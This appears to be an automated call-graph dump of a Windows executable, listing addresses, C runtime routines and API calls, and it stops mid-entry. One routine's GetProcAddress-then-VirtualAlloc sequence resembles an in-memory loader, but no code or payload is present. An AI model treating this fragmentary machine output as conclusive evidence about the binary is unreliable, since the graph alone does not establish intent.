16358 ab2e3f std::locale::_Setgloballocale 41 API calls 16356->16358 16359 aab0c1 IsProcessorFeaturePresent 16357->16359 16364 aab0e0 16357->16364 16358->16357 16361 aab0cd 16359->16361 16360 aac29e std::locale::_Setgloballocale 23 API calls 16362 aab0ea 16360->16362 16363 aa8e0b std::locale::_Setgloballocale 8 API calls 16361->16363 16363->16364 16364->16360 16366 aa212d __EH_prolog3 16365->16366 16367 aa3aa8 std::_Lockit::_Lockit 7 API calls 16366->16367 16368 aa2137 16367->16368 16381 aa25ec 16368->16381 16370 aa214e 16371 aa2161 16370->16371 16387 aa2a70 16370->16387 16372 aa3b00 std::_Lockit::~_Lockit 2 API calls 16371->16372 16374 aa21a8 codecvt 16372->16374 16374->16315 16375 aa2171 16376 aa2178 16375->16376 16377 aa21b0 16375->16377 16397 aa3c59 16376->16397 16400 aa2d20 16377->16400 16382 aa25f8 16381->16382 16383 aa261c 16381->16383 16384 aa3aa8 std::_Lockit::_Lockit 7 API calls 16382->16384 16383->16370 16385 aa2602 16384->16385 16386 aa3b00 std::_Lockit::~_Lockit 2 API calls 16385->16386 16386->16383 16389 aa2a7c __EH_prolog3 16387->16389 16388 aa2acd codecvt 16388->16375 16389->16388 16390 aa479f codecvt 43 API calls 16389->16390 16392 aa2a95 codecvt 16390->16392 16391 aa2abc 16391->16388 16419 aa2506 16391->16419 16392->16391 16404 aa232a 16392->16404 16395 aa2ab1 16416 aa22b4 16395->16416 16398 aa479f codecvt 43 API calls 16397->16398 16399 aa3c64 16398->16399 16399->16371 16401 aa2d2e Concurrency::cancel_current_task 16400->16401 16402 aa5ad1 Concurrency::cancel_current_task RaiseException 16401->16402 16403 aa2d3c 16402->16403 16405 aa2336 __EH_prolog3 16404->16405 16406 aa3aa8 std::_Lockit::_Lockit 7 API calls 16405->16406 16407 aa2343 16406->16407 16408 aa238c 16407->16408 16409 aa2377 16407->16409 16445 aa3a36 16408->16445 16436 aa3d89 16409->16436 16412 aa2380 codecvt 16412->16395 16492 aa3e9e 16416->16492 16522 aa3dd4 16419->16522 16422 aa2541 16424 aa2554 16422->16424 16425 aaa6c6 ___std_exception_destroy 14 API calls 16422->16425 16423 aaa6c6 ___std_exception_destroy 14 API calls 16423->16422 16426 aa2565 16424->16426 16428 aaa6c6 ___std_exception_destroy 14 API calls 16424->16428 16425->16424 16427 aa2576 16426->16427 16429 aaa6c6 ___std_exception_destroy 14 API calls 16426->16429 16430 aa2587 16427->16430 16431 aaa6c6 ___std_exception_destroy 14 API calls 16427->16431 16428->16426 16429->16427 16432 aa2598 16430->16432 16433 aaa6c6 ___std_exception_destroy 14 API calls 16430->16433 16431->16430 16434 aa3b00 std::_Lockit::~_Lockit 2 API calls 16432->16434 16433->16432 16435 aa25a3 16434->16435 16435->16388 16450 aaa9f8 16436->16450 16439 aa3be3 _Yarn 15 API calls 16440 aa3dad 16439->16440 16441 aa3dbd 16440->16441 16442 aaa9f8 std::_Locinfo::_Locinfo_dtor 69 API calls 16440->16442 16443 aa3be3 _Yarn 15 API calls 16441->16443 16442->16441 16444 aa3dd1 16443->16444 16444->16412 16489 aa39f7 16445->16489 16448 aa5ad1 Concurrency::cancel_current_task RaiseException 16449 aa3a55 16448->16449 16451 aaf58b std::_Lockit::_Lockit 5 API calls 16450->16451 16452 aaaa05 16451->16452 16455 aaa7a3 16452->16455 16456 aaa7af __FrameHandler3::FrameUnwindToState 16455->16456 16463 aaa722 EnterCriticalSection 16456->16463 16458 aaa7bd 16464 aaa7fe 16458->16464 16463->16458 16465 aaa95d std::_Locinfo::_Locinfo_dtor 69 API calls 16464->16465 16466 aaa819 16465->16466 16467 aaeb00 __Getctype 41 API calls 16466->16467 16485 aaa7ca 16466->16485 16468 aaa826 16467->16468 16469 ab252c std::_Locinfo::_Locinfo_dtor 43 API calls 16468->16469 16470 aaa84b 16469->16470 16471 aaa852 16470->16471 16472 ab1e71 __strnicoll 15 API calls 16470->16472 16474 aa9034 _Deallocate 11 API calls 16471->16474 16471->16485 16473 aaa877 16472->16473 16476 ab252c std::_Locinfo::_Locinfo_dtor 43 API calls 16473->16476 16473->16485 16475 aaa95c 16474->16475 16477 aaa893 16476->16477 16478 aaa89a 16477->16478 16479 aaa8b5 16477->16479 16478->16471 16480 aaa8ac 16478->16480 16482 aaee48 ___free_lconv_mon 14 API calls 16479->16482 16483 aaa8e0 16479->16483 16481 aaee48 ___free_lconv_mon 14 API calls 16480->16481 16481->16485 16482->16483 16484 aaee48 ___free_lconv_mon 14 API calls 16483->16484 16483->16485 16484->16485 16486 aaa7f2 16485->16486 16487 aaa76a std::_Lockit::~_Lockit LeaveCriticalSection 16486->16487 16488 aa3d95 16487->16488 16488->16439 16490 aa10d0 std::exception::exception 42 API calls 16489->16490 16491 aa3a09 16490->16491 16491->16448 16493 aaab94 __Getctype 41 API calls 16492->16493 16494 aa3ea7 __Getctype 16493->16494 16495 aa3edf 16494->16495 16496 aa3ec1 16494->16496 16498 aaaa30 __Getctype 41 API calls 16495->16498 16497 aaaa30 __Getctype 41 API calls 16496->16497 16499 aa3ec8 16497->16499 16498->16499 16500 aaabb9 __Getctype 41 API calls 16499->16500 16501 aa3ef0 16500->16501 16502 aa22d7 16501->16502 16504 aab048 16501->16504 16502->16391 16505 aab055 16504->16505 16510 aab090 16504->16510 16506 aaa798 _Yarn 15 API calls 16505->16506 16507 aab078 16506->16507 16507->16510 16513 ab2cc8 16507->16513 16510->16502 16511 aa9034 _Deallocate 11 API calls 16512 aab0a6 16511->16512 16514 ab2ce4 16513->16514 16515 ab2cd6 16513->16515 16516 aab188 __dosmaperr 14 API calls 16514->16516 16515->16514 16519 ab2cfe 16515->16519 16521 ab2cee 16516->16521 16517 aa9007 __strnicoll 41 API calls 16518 aab089 16517->16518 16518->16510 16518->16511 16519->16518 16520 aab188 __dosmaperr 14 API calls 16519->16520 16520->16521 16521->16517 16523 aa2532 16522->16523 16524 aa3de0 16522->16524 16523->16422 16523->16423 16525 aaa9f8 std::_Locinfo::_Locinfo_dtor 69 API calls 16524->16525 16525->16523 13660 aa4605 13661 aa4611 __FrameHandler3::FrameUnwindToState 13660->13661 13686 aa487b 13661->13686 13663 aa4618 13664 aa4771 13663->13664 13672 aa4642 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 13663->13672 13736 aa4e26 IsProcessorFeaturePresent 13664->13736 13666 aa4778 13716 aac2da 13666->13716 13671 aa4661 13672->13671 13673 aa46e2 13672->13673 13719 aac2b4 13672->13719 13694 aabf18 13673->13694 13676 aa46e8 13698 abc217 13676->13698 13681 aa470d 13682 aa4716 13681->13682 13727 aac28f 13681->13727 13730 aa49ec 13682->13730 13687 aa4884 13686->13687 13743 aa4b4c IsProcessorFeaturePresent 13687->13743 13691 aa4895 13692 aa4899 13691->13692 13753 aa789d 13691->13753 13692->13663 13695 aabf26 13694->13695 13696 aabf21 13694->13696 13695->13676 13813 aabc72 13696->13813 14474 aa172b 13698->14474 13700 abc22f GetModuleHandleA 14482 aa15b7 13700->14482 13702 abc249 _strlen 14486 aa166a 13702->14486 13704 abc25f _strlen 13705 aa166a std::ios_base::_Init 43 API calls 13704->13705 13706 abc275 GetProcAddress 13705->13706 13707 abc290 VirtualAlloc 13706->13707 14490 abc000 13707->14490 13709 abc2ad ctype 14496 abc0a0 13709->14496 13714 aa4791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 13715 aa46ff 13714->13715 13725 aa4f40 GetModuleHandleW 13715->13725 14720 aac0c2 13716->14720 13720 aac2ca __FrameHandler3::FrameUnwindToState std::_Lockit::_Lockit 13719->13720 13720->13673 13721 aaeb00 __Getctype 41 API calls 13720->13721 13722 aae03b 13721->13722 13723 aab0a7 __FrameHandler3::FrameUnwindToState 41 API calls 13722->13723 13724 aae065 13723->13724 13726 aa4709 13725->13726 13726->13666 13726->13681 13728 aac0c2 std::locale::_Setgloballocale 23 API calls 13727->13728 13729 aac29a 13728->13729 13729->13682 13731 aa49f8 13730->13731 13735 aa471f 13731->13735 14797 aadf9b 13731->14797 13733 aa4a06 13734 aa789d ___scrt_uninitialize_crt 7 API calls 13733->13734 13734->13735 13735->13671 13737 aa4e3c __fread_nolock std::locale::_Setgloballocale 13736->13737 13738 aa4ee7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13737->13738 13739 aa4f2b std::locale::_Setgloballocale 13738->13739 13739->13666 13740 aac29e 13741 aac0c2 std::locale::_Setgloballocale 23 API calls 13740->13741 13742 aa4786 13741->13742 13744 aa4890 13743->13744 13745 aa787e 13744->13745 13759 aa8957 13745->13759 13748 aa7887 13748->13691 13750 aa788f 13751 aa789a 13750->13751 13773 aa8993 13750->13773 13751->13691 13754 aa78b0 13753->13754 13755 aa78a6 13753->13755 13754->13692 13756 aa7a16 ___vcrt_uninitialize_ptd 6 API calls 13755->13756 13757 aa78ab 13756->13757 13758 aa8993 ___vcrt_uninitialize_locks DeleteCriticalSection 13757->13758 13758->13754 13760 aa8960 13759->13760 13762 aa8989 13760->13762 13763 aa7883 13760->13763 13777 aa8b9c 13760->13777 13764 aa8993 ___vcrt_uninitialize_locks DeleteCriticalSection 13762->13764 13763->13748 13765 aa79e3 13763->13765 13764->13763 13794 aa8aad 13765->13794 13768 aa79f8 13768->13750 13771 aa7a13 13771->13750 13774 aa89bd 13773->13774 13775 aa899e 13773->13775 13774->13748 13776 aa89a8 DeleteCriticalSection 13775->13776 13776->13774 13776->13776 13782 aa89c2 13777->13782 13780 aa8bd4 InitializeCriticalSectionAndSpinCount 13781 aa8bbf 13780->13781 13781->13760 13783 aa89df 13782->13783 13784 aa89e3 13782->13784 13783->13780 13783->13781 13784->13783 13785 aa8a4b GetProcAddress 13784->13785 13787 aa8a3c 13784->13787 13789 aa8a62 LoadLibraryExW 13784->13789 13785->13783 13787->13785 13788 aa8a44 FreeLibrary 13787->13788 13788->13785 13790 aa8aa9 13789->13790 13791 aa8a79 GetLastError 13789->13791 13790->13784 13791->13790 13792 aa8a84 ___vcrt_InitializeCriticalSectionEx 13791->13792 13792->13790 13793 aa8a9a LoadLibraryExW 13792->13793 13793->13784 13795 aa89c2 ___vcrt_InitializeCriticalSectionEx 5 API calls 13794->13795 13796 aa8ac7 13795->13796 13797 aa8ae0 TlsAlloc 13796->13797 13798 aa79ed 13796->13798 13798->13768 13799 aa8b5e 13798->13799 13800 aa89c2 ___vcrt_InitializeCriticalSectionEx 5 API calls 13799->13800 13801 aa8b78 13800->13801 13802 aa8b93 TlsSetValue 13801->13802 13803 aa7a06 13801->13803 13802->13803 13803->13771 13804 aa7a16 13803->13804 13805 aa7a26 13804->13805 13806 aa7a20 13804->13806 13805->13768 13808 aa8ae8 13806->13808 13809 aa89c2 ___vcrt_InitializeCriticalSectionEx 5 API calls 13808->13809 13810 aa8b02 13809->13810 13811 aa8b1a TlsFree 13810->13811 13812 aa8b0e 13810->13812 13811->13812 13812->13805 13814 aabc7b 13813->13814 13818 aabc91 13813->13818 13814->13818 13819 aabc9e 13814->13819 13816 aabc88 13816->13818 13836 aabe09 13816->13836 13818->13695 13820 aabcaa 13819->13820 13821 aabca7 13819->13821 13844 ab4d54 13820->13844 13821->13816 13826 aabcbb 13871 aaee48 13826->13871 13827 aabcc7 13877 aabcf8 13827->13877 13832 aaee48 ___free_lconv_mon 14 API calls 13833 aabceb 13832->13833 13834 aaee48 ___free_lconv_mon 14 API calls 13833->13834 13835 aabcf1 13834->13835 13835->13816 13837 aabe7a 13836->13837 13842 aabe18 13836->13842 13837->13818 13838 aaedeb __Getctype 14 API calls 13838->13842 13839 aabe7e 13841 aaee48 ___free_lconv_mon 14 API calls 13839->13841 13840 ab3ca4 WideCharToMultiByte std::_Locinfo::_Locinfo_dtor 13840->13842 13841->13837 13842->13837 13842->13838 13842->13839 13842->13840 13843 aaee48 ___free_lconv_mon 14 API calls 13842->13843 13843->13842 13845 aabcb0 13844->13845 13846 ab4d5d 13844->13846 13850 ab5056 GetEnvironmentStringsW 13845->13850 13899 aaebbb 13846->13899 13851 ab506e 13850->13851 13866 aabcb5 13850->13866 13852 ab3ca4 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 13851->13852 13853 ab508b 13852->13853 13854 ab50a0 13853->13854 13855 ab5095 FreeEnvironmentStringsW 13853->13855 13856 ab1e71 __strnicoll 15 API calls 13854->13856 13855->13866 13857 ab50a7 13856->13857 13858 ab50af 13857->13858 13859 ab50c0 13857->13859 13861 aaee48 ___free_lconv_mon 14 API calls 13858->13861 13860 ab3ca4 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 13859->13860 13862 ab50d0 13860->13862 13863 ab50b4 FreeEnvironmentStringsW 13861->13863 13864 ab50df 13862->13864 13865 ab50d7 13862->13865 13863->13866 13868 aaee48 ___free_lconv_mon 14 API calls 13864->13868 13867 aaee48 ___free_lconv_mon 14 API calls 13865->13867 13866->13826 13866->13827 13869 ab50dd FreeEnvironmentStringsW 13867->13869 13868->13869 13869->13866 13872 aaee53 HeapFree 13871->13872 13873 aabcc1 13871->13873 13872->13873 13874 aaee68 GetLastError 13872->13874 13873->13816 13875 aaee75 __dosmaperr 13874->13875 13876 aab188 __dosmaperr 12 API calls 13875->13876 13876->13873 13878 aabd0d 13877->13878 13879 aaedeb __Getctype 14 API calls 13878->13879 13880 aabd34 13879->13880 13881 aabd3c 13880->13881 13889 aabd46 13880->13889 13882 aaee48 ___free_lconv_mon 14 API calls 13881->13882 13898 aabcce 13882->13898 13883 aabda3 13884 aaee48 ___free_lconv_mon 14 API calls 13883->13884 13884->13898 13885 aaedeb __Getctype 14 API calls 13885->13889 13886 aabdb2 14464 aabdda 13886->14464 13889->13883 13889->13885 13889->13886 13891 aabdcd 13889->13891 13894 aaee48 ___free_lconv_mon 14 API calls 13889->13894 14455 aae066 13889->14455 14470 aa9034 IsProcessorFeaturePresent 13891->14470 13892 aaee48 ___free_lconv_mon 14 API calls 13893 aabdbf 13892->13893 13896 aaee48 ___free_lconv_mon 14 API calls 13893->13896 13894->13889 13896->13898 13897 aabdd9 13898->13832 13900 aaebcc 13899->13900 13901 aaebc6 13899->13901 13906 aaebd2 13900->13906 13955 aaf373 13900->13955 13950 aaf334 13901->13950 13905 aaebea 13960 aaedeb 13905->13960 13909 aaebd7 13906->13909 13972 aab0a7 13906->13972 13927 ab4b5f 13909->13927 13912 aaebfe 13914 aaf373 __Getctype 6 API calls 13912->13914 13913 aaec13 13915 aaf373 __Getctype 6 API calls 13913->13915 13922 aaec0a 13914->13922 13916 aaec1f 13915->13916 13917 aaec32 13916->13917 13918 aaec23 13916->13918 13967 aae92e 13917->13967 13921 aaf373 __Getctype 6 API calls 13918->13921 13920 aaee48 ___free_lconv_mon 14 API calls 13924 aaec10 13920->13924 13921->13922 13922->13920 13924->13906 13925 aaee48 ___free_lconv_mon 14 API calls 13926 aaec44 13925->13926 13926->13909 14255 ab4cb4 13927->14255 13934 ab4bbb 13937 aaee48 ___free_lconv_mon 14 API calls 13934->13937 13935 ab4bc9 14282 ab4daf 13935->14282 13939 ab4ba2 13937->13939 13939->13845 13940 ab4c01 13941 aab188 __dosmaperr 14 API calls 13940->13941 13942 ab4c06 13941->13942 13945 aaee48 ___free_lconv_mon 14 API calls 13942->13945 13943 ab4c48 13944 ab4c91 13943->13944 14293 ab47d1 13943->14293 13948 aaee48 ___free_lconv_mon 14 API calls 13944->13948 13945->13939 13946 ab4c1c 13946->13943 13949 aaee48 ___free_lconv_mon 14 API calls 13946->13949 13948->13939 13949->13943 13983 aaf123 13950->13983 13953 aaf36b TlsGetValue 13954 aaf359 13954->13900 13956 aaf123 std::_Lockit::_Lockit 5 API calls 13955->13956 13957 aaf38f 13956->13957 13958 aaebe6 13957->13958 13959 aaf3ad TlsSetValue 13957->13959 13958->13905 13958->13906 13966 aaedf8 __Getctype 13960->13966 13961 aaee38 14001 aab188 13961->14001 13962 aaee23 HeapAlloc 13964 aaebf6 13962->13964 13962->13966 13964->13912 13964->13913 13966->13961 13966->13962 13998 aadac3 13966->13998 14038 aae7c2 13967->14038 14140 ab2dfa 13972->14140 13975 aab0b7 13977 aab0c1 IsProcessorFeaturePresent 13975->13977 13982 aab0e0 13975->13982 13979 aab0cd 13977->13979 13978 aac29e std::locale::_Setgloballocale 23 API calls 13980 aab0ea 13978->13980 14170 aa8e0b 13979->14170 13982->13978 13984 aaf151 13983->13984 13988 aaf14d 13983->13988 13984->13988 13990 aaf058 13984->13990 13987 aaf16b GetProcAddress 13987->13988 13989 aaf17b std::_Lockit::_Lockit 13987->13989 13988->13953 13988->13954 13989->13988 13996 aaf069 ___vcrt_InitializeCriticalSectionEx 13990->13996 13991 aaf0ff 13991->13987 13991->13988 13992 aaf087 LoadLibraryExW 13993 aaf0a2 GetLastError 13992->13993 13994 aaf106 13992->13994 13993->13996 13994->13991 13995 aaf118 FreeLibrary 13994->13995 13995->13991 13996->13991 13996->13992 13997 aaf0d5 LoadLibraryExW 13996->13997 13997->13994 13997->13996 14004 aadaf0 13998->14004 14015 aaec51 GetLastError 14001->14015 14003 aab18d 14003->13964 14005 aadafc __FrameHandler3::FrameUnwindToState 14004->14005 14010 aaa722 EnterCriticalSection 14005->14010 14007 aadb07 14011 aadb43 14007->14011 14010->14007 14014 aaa76a LeaveCriticalSection 14011->14014 14013 aadace 14013->13966 14014->14013 14016 aaec67 14015->14016 14020 aaec6d 14015->14020 14017 aaf334 __Getctype 6 API calls 14016->14017 14017->14020 14018 aaf373 __Getctype 6 API calls 14019 aaec89 14018->14019 14022 aaedeb __Getctype 12 API calls 14019->14022 14035 aaec71 SetLastError 14019->14035 14020->14018 14020->14035 14023 aaec9e 14022->14023 14024 aaeca6 14023->14024 14025 aaecb7 14023->14025 14026 aaf373 __Getctype 6 API calls 14024->14026 14027 aaf373 __Getctype 6 API calls 14025->14027 14028 aaecb4 14026->14028 14029 aaecc3 14027->14029 14033 aaee48 ___free_lconv_mon 12 API calls 14028->14033 14030 aaecde 14029->14030 14031 aaecc7 14029->14031 14034 aae92e __Getctype 12 API calls 14030->14034 14032 aaf373 __Getctype 6 API calls 14031->14032 14032->14028 14033->14035 14036 aaece9 14034->14036 14035->14003 14037 aaee48 ___free_lconv_mon 12 API calls 14036->14037 14037->14035 14039 aae7ce __FrameHandler3::FrameUnwindToState 14038->14039 14052 aaa722 EnterCriticalSection 14039->14052 14041 aae7d8 14053 aae808 14041->14053 14044 aae8d4 14045 aae8e0 __FrameHandler3::FrameUnwindToState 14044->14045 14057 aaa722 EnterCriticalSection 14045->14057 14047 aae8ea 14058 aaeab5 14047->14058 14049 aae902 14062 aae922 14049->14062 14052->14041 14056 aaa76a LeaveCriticalSection 14053->14056 14055 aae7f6 14055->14044 14056->14055 14057->14047 14059 aaeac4 __Getctype 14058->14059 14060 aaeaeb __Getctype 14058->14060 14059->14060 14065 ab649e 14059->14065 14060->14049 14139 aaa76a LeaveCriticalSection 14062->14139 14064 aae910 14064->13925 14066 ab651e 14065->14066 14068 ab64b4 14065->14068 14069 aaee48 ___free_lconv_mon 14 API calls 14066->14069 14092 ab656c 14066->14092 14068->14066 14073 aaee48 ___free_lconv_mon 14 API calls 14068->14073 14074 ab64e7 14068->14074 14070 ab6540 14069->14070 14071 aaee48 ___free_lconv_mon 14 API calls 14070->14071 14075 ab6553 14071->14075 14072 ab657a 14078 ab65da 14072->14078 14084 aaee48 14 API calls ___free_lconv_mon 14072->14084 14079 ab64dc 14073->14079 14080 aaee48 ___free_lconv_mon 14 API calls 14074->14080 14091 ab6509 14074->14091 14081 aaee48 ___free_lconv_mon 14 API calls 14075->14081 14076 aaee48 ___free_lconv_mon 14 API calls 14077 ab6513 14076->14077 14082 aaee48 ___free_lconv_mon 14 API calls 14077->14082 14083 aaee48 ___free_lconv_mon 14 API calls 14078->14083 14093 ab5754 14079->14093 14086 ab64fe 14080->14086 14087 ab6561 14081->14087 14082->14066 14088 ab65e0 14083->14088 14084->14072 14121 ab5c08 14086->14121 14090 aaee48 ___free_lconv_mon 14 API calls 14087->14090 14088->14060 14090->14092 14091->14076 14133 ab660f 14092->14133 14094 ab5765 14093->14094 14120 ab584e 14093->14120 14095 ab5776 14094->14095 14097 aaee48 ___free_lconv_mon 14 API calls 14094->14097 14096 ab5788 14095->14096 14098 aaee48 ___free_lconv_mon 14 API calls 14095->14098 14099 ab579a 14096->14099 14100 aaee48 ___free_lconv_mon 14 API calls 14096->14100 14097->14095 14098->14096 14101 ab57ac 14099->14101 14102 aaee48 ___free_lconv_mon 14 API calls 14099->14102 14100->14099 14103 ab57be 14101->14103 14105 aaee48 ___free_lconv_mon 14 API calls 14101->14105 14102->14101 14104 ab57d0 14103->14104 14106 aaee48 ___free_lconv_mon 14 API calls 14103->14106 14107 ab57e2 14104->14107 14108 aaee48 ___free_lconv_mon 14 API calls 14104->14108 14105->14103 14106->14104 14109 aaee48 ___free_lconv_mon 14 API calls 14107->14109 14110 ab57f4 14107->14110 14108->14107 14109->14110 14111 ab5806 14110->14111 14113 aaee48 ___free_lconv_mon 14 API calls 14110->14113 14112 ab5818 14111->14112 14114 aaee48 ___free_lconv_mon 14 API calls 14111->14114 14115 ab582a 14112->14115 14116 aaee48 ___free_lconv_mon 14 API calls 14112->14116 14113->14111 14114->14112 14117 ab583c 14115->14117 14118 aaee48 ___free_lconv_mon 14 API calls 14115->14118 14116->14115 14119 aaee48 ___free_lconv_mon 14 API calls 14117->14119 14117->14120 14118->14117 14119->14120 14120->14074 14122 ab5c15 14121->14122 14132 ab5c6d 14121->14132 14123 ab5c25 14122->14123 14124 aaee48 ___free_lconv_mon 14 API calls 14122->14124 14125 ab5c37 14123->14125 14126 aaee48 ___free_lconv_mon 14 API calls 14123->14126 14124->14123 14127 aaee48 ___free_lconv_mon 14 API calls 14125->14127 14128 ab5c49 14125->14128 14126->14125 14127->14128 14129 aaee48 ___free_lconv_mon 14 API calls 14128->14129 14130 ab5c5b 14128->14130 14129->14130 14131 aaee48 ___free_lconv_mon 14 API calls 14130->14131 14130->14132 14131->14132 14132->14091 14134 ab663b 14133->14134 14135 ab661c 14133->14135 14134->14072 14135->14134 14136 ab6123 __Getctype 14 API calls 14135->14136 14137 ab6635 14136->14137 14138 aaee48 ___free_lconv_mon 14 API calls 14137->14138 14138->14134 14139->14064 14176 ab2d2c 14140->14176 14143 ab2e3f 14144 ab2e4b __FrameHandler3::FrameUnwindToState 14143->14144 14145 aaec51 __dosmaperr 14 API calls 14144->14145 14149 ab2e78 std::locale::_Setgloballocale 14144->14149 14153 ab2e72 std::locale::_Setgloballocale 14144->14153 14145->14153 14146 ab2ebf 14148 aab188 __dosmaperr 14 API calls 14146->14148 14147 ab2ea9 14147->13975 14150 ab2ec4 14148->14150 14152 ab2eeb 14149->14152 14190 aaa722 EnterCriticalSection 14149->14190 14187 aa9007 14150->14187 14156 ab301e 14152->14156 14157 ab2f2d 14152->14157 14167 ab2f5c 14152->14167 14153->14146 14153->14147 14153->14149 14158 ab3029 14156->14158 14222 aaa76a LeaveCriticalSection 14156->14222 14157->14167 14191 aaeb00 GetLastError 14157->14191 14161 aac29e std::locale::_Setgloballocale 23 API calls 14158->14161 14163 ab3031 14161->14163 14165 aaeb00 __Getctype 41 API calls 14168 ab2fb1 14165->14168 14166 aaeb00 __Getctype 41 API calls 14166->14167 14218 ab2fcb 14167->14218 14168->14147 14169 aaeb00 __Getctype 41 API calls 14168->14169 14169->14147 14171 aa8e27 __fread_nolock std::locale::_Setgloballocale 14170->14171 14172 aa8e53 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14171->14172 14175 aa8f24 std::locale::_Setgloballocale 14172->14175 14174 aa8f42 14174->13982 14247 aa4791 14175->14247 14177 ab2d38 __FrameHandler3::FrameUnwindToState 14176->14177 14182 aaa722 EnterCriticalSection 14177->14182 14179 ab2d46 14183 ab2d84 14179->14183 14182->14179 14186 aaa76a LeaveCriticalSection 14183->14186 14185 aab0ac 14185->13975 14185->14143 14186->14185 14223 aa8f53 14187->14223 14190->14152 14192 aaeb1c 14191->14192 14193 aaeb16 14191->14193 14195 aaf373 __Getctype 6 API calls 14192->14195 14197 aaeb20 SetLastError 14192->14197 14194 aaf334 __Getctype 6 API calls 14193->14194 14194->14192 14196 aaeb38 14195->14196 14196->14197 14199 aaedeb __Getctype 14 API calls 14196->14199 14201 aaebb0 14197->14201 14202 aaebb5 14197->14202 14200 aaeb4d 14199->14200 14203 aaeb66 14200->14203 14204 aaeb55 14200->14204 14201->14166 14205 aab0a7 __FrameHandler3::FrameUnwindToState 39 API calls 14202->14205 14207 aaf373 __Getctype 6 API calls 14203->14207 14206 aaf373 __Getctype 6 API calls 14204->14206 14208 aaebba 14205->14208 14209 aaeb63 14206->14209 14210 aaeb72 14207->14210 14215 aaee48 ___free_lconv_mon 14 API calls 14209->14215 14211 aaeb8d 14210->14211 14212 aaeb76 14210->14212 14213 aae92e __Getctype 14 API calls 14211->14213 14214 aaf373 __Getctype 6 API calls 14212->14214 14216 aaeb98 14213->14216 14214->14209 14215->14197 14217 aaee48 ___free_lconv_mon 14 API calls 14216->14217 14217->14197 14219 ab2fa2 14218->14219 14220 ab2fd1 14218->14220 14219->14147 14219->14165 14219->14168 14246 aaa76a LeaveCriticalSection 14220->14246 14222->14158 14224 aa8f65 _Fputc 14223->14224 14229 aa8f8a 14224->14229 14226 aa8f7d 14240 aa8d43 14226->14240 14230 aa8f9a 14229->14230 14231 aa8fa1 14229->14231 14232 aa8da8 __strnicoll 16 API calls 14230->14232 14233 aa8d7f __strnicoll GetLastError SetLastError 14231->14233 14236 aa8faf 14231->14236 14232->14231 14234 aa8fd6 14233->14234 14235 aa9034 _Deallocate 11 API calls 14234->14235 14234->14236 14237 aa9006 14235->14237 14236->14226 14238 aa8f53 __strnicoll 41 API calls 14237->14238 14239 aa9013 14238->14239 14239->14226 14241 aa8d4f 14240->14241 14242 aa8d66 14241->14242 14243 aa8dee _Fputc 41 API calls 14241->14243 14244 aa8d79 14242->14244 14245 aa8dee _Fputc 41 API calls 14242->14245 14243->14242 14244->14147 14245->14244 14246->14219 14248 aa479a IsProcessorFeaturePresent 14247->14248 14249 aa4799 14247->14249 14251 aa50d2 14248->14251 14249->14174 14254 aa5095 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14251->14254 14253 aa51b5 14253->14174 14254->14253 14256 ab4cc0 __FrameHandler3::FrameUnwindToState 14255->14256 14257 ab4cda 14256->14257 14301 aaa722 EnterCriticalSection 14256->14301 14259 ab4b89 14257->14259 14261 aab0a7 __FrameHandler3::FrameUnwindToState 41 API calls 14257->14261 14266 ab48df 14259->14266 14262 ab4d53 14261->14262 14263 ab4cea 14264 aaee48 ___free_lconv_mon 14 API calls 14263->14264 14265 ab4d16 14263->14265 14264->14265 14302 ab4d33 14265->14302 14306 aab19b 14266->14306 14269 ab4912 14271 ab4929 14269->14271 14272 ab4917 GetACP 14269->14272 14270 ab4900 GetOEMCP 14270->14271 14271->13939 14273 ab1e71 14271->14273 14272->14271 14274 ab1eaf 14273->14274 14275 ab1e7f 14273->14275 14277 aab188 __dosmaperr 14 API calls 14274->14277 14276 ab1e9a HeapAlloc 14275->14276 14280 ab1e83 __Getctype 14275->14280 14278 ab1ead 14276->14278 14276->14280 14279 ab1eb4 14277->14279 14278->14279 14279->13934 14279->13935 14280->14274 14280->14276 14281 aadac3 codecvt 2 API calls 14280->14281 14281->14280 14283 ab48df 43 API calls 14282->14283 14284 ab4dcf 14283->14284 14286 ab4e0c IsValidCodePage 14284->14286 14291 ab4e48 __fread_nolock 14284->14291 14285 aa4791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 14287 ab4bf6 14285->14287 14288 ab4e1e 14286->14288 14286->14291 14287->13940 14287->13946 14289 ab4e4d GetCPInfo 14288->14289 14292 ab4e27 __fread_nolock 14288->14292 14289->14291 14289->14292 14291->14285 14291->14291 14348 ab49b3 14292->14348 14294 ab47dd __FrameHandler3::FrameUnwindToState 14293->14294 14429 aaa722 EnterCriticalSection 14294->14429 14296 ab47e7 14430 ab481e 14296->14430 14301->14263 14305 aaa76a LeaveCriticalSection 14302->14305 14304 ab4d3a 14304->14257 14305->14304 14307 aab1b9 14306->14307 14313 aab1b2 14306->14313 14308 aaeb00 __Getctype 41 API calls 14307->14308 14307->14313 14309 aab1da 14308->14309 14314 ab256a 14309->14314 14313->14269 14313->14270 14315 ab257d 14314->14315 14316 aab1f0 14314->14316 14315->14316 14322 ab66ea 14315->14322 14318 ab25c8 14316->14318 14319 ab25db 14318->14319 14320 ab25f0 14318->14320 14319->14320 14343 ab4d9c 14319->14343 14320->14313 14323 ab66f6 __FrameHandler3::FrameUnwindToState 14322->14323 14324 aaeb00 __Getctype 41 API calls 14323->14324 14325 ab66ff 14324->14325 14326 ab6745 14325->14326 14335 aaa722 EnterCriticalSection 14325->14335 14326->14316 14328 ab671d 14336 ab676b 14328->14336 14333 aab0a7 __FrameHandler3::FrameUnwindToState 41 API calls 14334 ab676a 14333->14334 14335->14328 14337 ab6779 __Getctype 14336->14337 14339 ab672e 14336->14339 14338 ab649e __Getctype 14 API calls 14337->14338 14337->14339 14338->14339 14340 ab674a 14339->14340 14341 aaa76a std::_Lockit::~_Lockit LeaveCriticalSection 14340->14341 14342 ab6741 14341->14342 14342->14326 14342->14333 14344 aaeb00 __Getctype 41 API calls 14343->14344 14345 ab4da1 14344->14345 14346 ab4cb4 __strnicoll 41 API calls 14345->14346 14347 ab4dac 14346->14347 14347->14320 14349 ab49db GetCPInfo 